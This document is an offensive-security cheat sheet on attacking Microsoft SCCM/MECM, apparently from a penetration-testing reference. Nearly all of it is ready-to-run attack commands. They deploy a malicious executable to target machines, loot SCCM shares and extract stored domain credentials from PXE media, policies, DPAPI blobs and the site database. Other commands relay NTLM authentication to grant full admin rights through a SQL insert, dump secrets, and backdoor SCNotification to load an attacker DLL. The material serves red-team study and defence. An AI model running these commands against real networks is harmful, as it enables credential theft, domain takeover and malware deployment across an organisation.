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# Deployment - SCCM
> SCCM is a solution from Microsoft to enhance administration in a scalable way across an organisation.
## SCCM Application Deployment
> Application Deployment is a process that involves packaging software applications and distributing them to selected computers or devices within an organization
* [PowerShellMafia/PowerSCCM - PowerShell module to interact with SCCM deployments](https://github.com/PowerShellMafia/PowerSCCM)
* [nettitude/MalSCCM - Abuse local or remote SCCM servers to deploy malicious applications to hosts they manage](https://github.com/nettitude/MalSCCM)
* Using **SharpSCCM**
.\SharpSCCM.exe get devices --server <SERVER8NAME> --site-code <SITE_CODE>
.\SharpSCCM.exe <server> <sitecode> exec -d <device_name> -r <relay_server_ip>
.\SharpSCCM.exe exec -d WS01 -p "C:\Windows\System32\ping" -s --debug
* Compromise client, use locate to find management server
MalSCCM.exe locate
* Enumerate over WMI as an administrator of the Distribution Point
MalSCCM.exe inspect /server:<DistributionPoint Server FQDN> /groups
* Compromise management server, use locate to find primary server
* Use `inspect` on primary server to view who you can target
MalSCCM.exe inspect /all
MalSCCM.exe inspect /computers
MalSCCM.exe inspect /primaryusers
MalSCCM.exe inspect /groups
* Create a new device group for the machines you want to laterally move too
MalSCCM.exe group /create /groupname:TargetGroup /grouptype:device
MalSCCM.exe inspect /groups
* Add your targets into the new group
MalSCCM.exe group /addhost /groupname:TargetGroup /host:WIN2016-SQL
* Create an application pointing to a malicious EXE on a world readable share : `SCCMContentLib$`
MalSCCM.exe app /create /name:demoapp /uncpath:"\\BLORE-SCCM\SCCMContentLib$\localthread.exe"
MalSCCM.exe inspect /applications
* Deploy the application to the target group
MalSCCM.exe app /deploy /name:demoapp /groupname:TargetGroup /assignmentname:demodeployment
MalSCCM.exe inspect /deployments
* Force the target group to checkin for updates
MalSCCM.exe checkin /groupname:TargetGroup
* Cleanup the application, deployment and group
MalSCCM.exe app /cleanup /name:demoapp
MalSCCM.exe group /delete /groupname:TargetGroup
## SCCM Shares
> Find interesting files stored on (System Center) Configuration Manager (SCCM/CM) SMB shares
* [1njected/CMLoot](https://github.com/1njected/CMLoot)
Invoke-CMLootInventory -SCCMHost sccm01.domain.local -Outfile sccmfiles.txt
Invoke-CMLootDownload -SingleFile \\sccm\SCCMContentLib$\DataLib\SC100001.1\x86\MigApp.xml
Invoke-CMLootDownload -InventoryFile .\sccmfiles.txt -Extension msi
## SCCM Configuration Manager
* [subat0mik/Misconfiguration-Manager/MisconfigurationManager.ps1](https://raw.githubusercontent.com/subat0mik/Misconfiguration-Manager/main/MisconfigurationManager.ps1)
### CRED-1 Retrieve credentials via PXE boot media
* [Misconfiguration-Manager - CRED-1](https://github.com/subat0mik/Misconfiguration-Manager/blob/main/attack-techniques/CRED/CRED-1/cred-1_description.md)
* On the SCCM Distribution Point: `HKLM\Software\Microsoft\SMS\DP\PxeInstalled` = 1
* On the SCCM Distribution Point: `HKLM\Software\Microsoft\SMS\DP\IsPxe` = 1
* PXE-enabled distribution point
* [csandker/pxethiefy](https://github.com/csandker/pxethiefy)
sudo python3 pxethiefy.py explore -i eth0
* [MWR-CyberSec/PXEThief](https://github.com/MWR-CyberSec/PXEThief)
### CRED-2 Request a policy containing credentials
* [Misconfiguration-Manager - CRED-2](https://github.com/subat0mik/Misconfiguration-Manager/blob/main/attack-techniques/CRED/CRED-2/cred-2_description.md)
* PKI certificates are not required for client authentication
* Domain accounts credential
Create a machine or compromise an existing one, then request policies such as `NAAConfig`
Easy mode using `SharpSCCM`
SharpSCCM get secrets -u <username-machine-$> -p <password>
SharpSCCM get naa
Stealthy mode by creating a computer.
* Create a machine account with a specific password: `addcomputer.py -computer-name 'customsccm$' -computer-pass 'YourStrongPassword123*' 'sccm.lab/carol:SCCMftw' -dc-ip`
* In your `/etc/hosts` file, add an entry for the MECM server: ` MECM MECM.SCCM.LAB`
* Use `sccmwtf` to request a policy: `python3 sccmwtf.py fake fakepc.sccm.lab MECM 'SCCMLAB\customsccm$' 'YourStrongPassword123*'`
* Parse the policy to extract the credentials and decrypt them using [sccmwtf/policysecretunobfuscate.py](https://github.com/xpn/sccmwtf/blob/main/policysecretunobfuscate.py): `cat /tmp/naapolicy.xml |grep 'NetworkAccessUsername\|NetworkAccessPassword' -A 5 |grep -e 'CDATA' | cut -d '[' -f 3|cut -d ']' -f 1| xargs -I {} python3 policysecretunobfuscate.py {}`
### CRED-3 Extract currently deployed credentials stored as DPAPI blobs
> Dump currently deployed secrets via WMI. If you can escalate on a host that is an SCCM client, you can retrieve plaintext domain credentials.
* [Misconfiguration-Manager - CRED-3](https://github.com/subat0mik/Misconfiguration-Manager/blob/main/attack-techniques/CRED/CRED-3/cred-3_description.md)
* Local administrator privileges on an SCCM client
* Find SCCM blob
Get-Wmiobject -namespace "root\ccm\policy\Machine\ActualConfig" -class "CCM_NetworkAccessAccount"
NetworkAccessPassword : <![CDATA[E600000001...8C6B5]]>
NetworkAccessUsername : <![CDATA[E600000001...00F92]]>
* Using [GhostPack/SharpDPAPI](https://github.com/GhostPack/SharpDPAPI/blob/81e1fcdd44e04cf84ca0085cf5db2be4f7421903/SharpDPAPI/Commands/SCCM.cs#L208-L244)
$str = "060...F2DAF"
$bytes = for($i=0; $i -lt $str.Length; $i++) {[byte]::Parse($str.Substring($i, 2), [System.Globalization.NumberStyles]::HexNumber); $i++}
$b64 = [Convert]::ToBase64String($bytes[4..$bytes.Length])
.\SharpDPAPI.exe blob /target:$b64 /mkfile:masterkeys.txt
* Using [Mayyhem/SharpSCCM](https://github.com/Mayyhem/SharpSCCM) for SCCM retrieval and decryption
.\SharpSCCM.exe local secrets -m wmi
From a remote machine.
* Using [garrettfoster13/sccmhunter](https://github.com/garrettfoster13/sccmhunter)
python3 ./sccmhunter.py http -u "administrator" -p "P@ssw0rd" -d internal.lab -dc-ip -auto
### CRED-4 Extract legacy credentials stored as DPAPI blobs
* [Misconfiguration-Manager - CRED-4](https://github.com/subat0mik/Misconfiguration-Manager/blob/main/attack-techniques/CRED/CRED-4/cred-4_description.md)
* Local administrator privileges on an SCCM client
* Search the database using `SharpDPAPI`
.\SharpDPAPI.exe search /type:file /path:C:\Windows\System32\wbem\Repository\OBJECTS.DATA
* Search the database using `SharpSCCM`
.\SharpSCCM.exe local secrets -m disk
* Check ACL for the CIM repository located at `C:\Windows\System32\wbem\Repository\OBJECTS.DATA`:
Get-Acl C:\Windows\System32\wbem\Repository\OBJECTS.DATA | Format-List -Property PSPath,sddl
ConvertFrom-SddlString ""
### CRED-5 Extract the SC_UserAccount table from the site database
* [Misconfiguration-Manager - CRED-5](https://github.com/subat0mik/Misconfiguration-Manager/blob/main/attack-techniques/CRED/CRED-5/cred-5_description.md)
* Site database access
* Primary site server access
* Access to the private key used for encryption
* [gentilkiwi/mimikatz](https://twitter.com/gentilkiwi/status/1392204021461569537)
mimikatz # misc::sccm /connectionstring:"DRIVER={SQL Server};Trusted=true;DATABASE=ConfigMgr_CHQ;SERVER=CM1;"
* [skahwah/SQLRecon](https://github.com/skahwah/SQLRecon), only if the site server and database are hosted on the same system
SQLRecon.exe /auth:WinToken /host:CM1 /database:ConfigMgr_CHQ /module:sDecryptCredentials
* SQLRecon + [xpn/sccmdecryptpoc.cs](https://gist.github.com/xpn/5f497d2725a041922c427c3aaa3b37d1)
SQLRecon.exe /auth:WinToken /host:<SITE-DB> /database:CM_<SITECODE> /module:query /command:"SELECT * FROM SC_UserAccount"
sccmdecryptpoc.exe 0C010000080[...]5D6F0
## SCCM Relay
### TAKEOVER1 - Low Privileges to Database Administrator - MSSQL relay
- Database separated from the site server
- Server site is sysadmin of the database
* Generate the query to elevate our user: `python3 sccmhunter.py mssql -u carol -p SCCMftw -d sccm.lab -dc-ip -debug -tu carol -sc P01 -stacked`
* Setup a relay with the generated query: `ntlmrelayx.py -smb2support -ts -t mssql:// -q "USE CM_P01; INSERT INTO RBAC_Admins (AdminSID,LogonName,IsGroup,IsDeleted,CreatedBy,CreatedDate,ModifiedBy,ModifiedDate,SourceSite) VALUES (0x01050000000000051500000058ED3FD3BF25B04EDE28E7B85A040000,'SCCMLAB\carol',0,0,'','','','','P01');INSERT INTO RBAC_ExtendedPermissions (AdminID,RoleID,ScopeID,ScopeTypeID) VALUES ((SELECT AdminID FROM RBAC_Admins WHERE LogonName = 'SCCMLAB\carol'),'SMS0001R','SMS00ALL','29');INSERT INTO RBAC_ExtendedPermissions (AdminID,RoleID,ScopeID,ScopeTypeID) VALUES ((SELECT AdminID FROM RBAC_Admins WHERE LogonName = 'SCCMLAB\carol'),'SMS0001R','SMS00001','1'); INSERT INTO RBAC_ExtendedPermissions (AdminID,RoleID,ScopeID,ScopeTypeID) VALUES ((SELECT AdminID FROM RBAC_Admins WHERE LogonName = 'SCCMLAB\carol'),'SMS0001R','SMS00004','1');"`
* Coerce an authentication to your listener using a domain account: `petitpotam.py -d sccm.lab -u carol -p SCCMftw`
* Finally, connect as admin on the MSSQL server: `python3 sccmhunter.py admin -u carol@sccm.lab -p 'SCCMftw' -ip `
### TAKEOVER2 - Low Privileges to MECM Admin Account - SMB relay
Microsoft requires the site server's computer account to be an administrator on the MSSQL server.
* Start a listener for the MSSQL Server: `ntlmrelayx -t -smb2support -socks`
* Coerce an authentication from the Site Server using domain credentials (low privileges SCCM NAA retrieved on the same machine works great): `petitpotam.py -d sccm.lab -u sccm-naa -p 123456789`
* Finally use the SOCKS from `ntlmrelayx` to access the MSSQL server as a local administrator
proxychains -q smbexec.py -no-pass SCCMLAB/'MECM$'@
proxychains -q secretsdump.py -no-pass SCCMLAB/'MECM$'@
## SCCM Persistence
* [mandiant/CcmPwn](https://github.com/mandiant/CcmPwn) - lateral movement script that leverages the CcmExec service to remotely hijack user sessions.
CcmExec is a service native to SCCM Windows clients that is executed on every interactive session. This technique requires Adminsitrator privileges on the targeted machine.
* Backdoor the `SCNotification.exe.config` to load your DLL
python3 ccmpwn.py domain/user:password@workstation.domain.local exec -dll evil.dll -config exploit.config
* Malicious config to force `SCNotification.exe` to load a file from an attacker-controlled file share
python3 ccmpwn.py domain/user:password@workstation.domain.local coerce -computer
## References
* [Network Access Accounts are evil… - ROGER ZANDER - 13 SEP 2015](https://rzander.azurewebsites.net/network-access-accounts-are-evil/)
* [The Phantom Credentials of SCCM: Why the NAA Won’t Die - Duane Michael - Jun 28](https://posts.specterops.io/the-phantom-credentials-of-sccm-why-the-naa-wont-die-332ac7aa1ab9)
* [Introducing MalSCCM - Phil Keeble -May 4, 2022](https://labs.nettitude.com/blog/introducing-malsccm/)
* [Exploiting RBCD Using a Normal User Account - tiraniddo.dev - Friday, 13 May 2022](https://www.tiraniddo.dev/2022/05/exploiting-rbcd-using-normal-user.html)
* [Exploring SCCM by Unobfuscating Network Access Accounts - @_xpn_ - Posted on 2022-07-09](https://blog.xpnsec.com/unobfuscating-network-access-accounts/)
* [Relaying NTLM Authentication from SCCM Clients - Chris Thompson - Jun 30, 2022](https://posts.specterops.io/relaying-ntlm-authentication-from-sccm-clients-7dccb8f92867)
* [Misconfiguration Manager: Overlooked and Overprivileged - Duane Michael - Mar 5, 2024](https://posts.specterops.io/misconfiguration-manager-overlooked-and-overprivileged-70983b8f350d)
* [SeeSeeYouExec: Windows Session Hijacking via CcmExec - Andrew Oliveau](https://cloud.google.com/blog/topics/threat-intelligence/windows-session-hijacking-via-ccmexec?hl=en)
* [SCCM / MECM LAB - Part 0x0 - mayfly - Mar 23, 2024](https://mayfly277.github.io/posts/SCCM-LAB-part0x0/)
* [SCCM / MECM LAB - Part 0x1 - Recon and PXE - mayfly - Mar 28, 2024](https://mayfly277.github.io/posts/SCCM-LAB-part0x1/)
* [SCCM / MECM LAB - Part 0x2 - Low user - mayfly - Mar 28, 2024](https://mayfly277.github.io/posts/SCCM-LAB-part0x2/)
* [SCCM / MECM LAB - Part 0x3 - Admin User - mayfly - Apr 3, 2024](https://mayfly277.github.io/posts/SCCM-LAB-part0x3/) |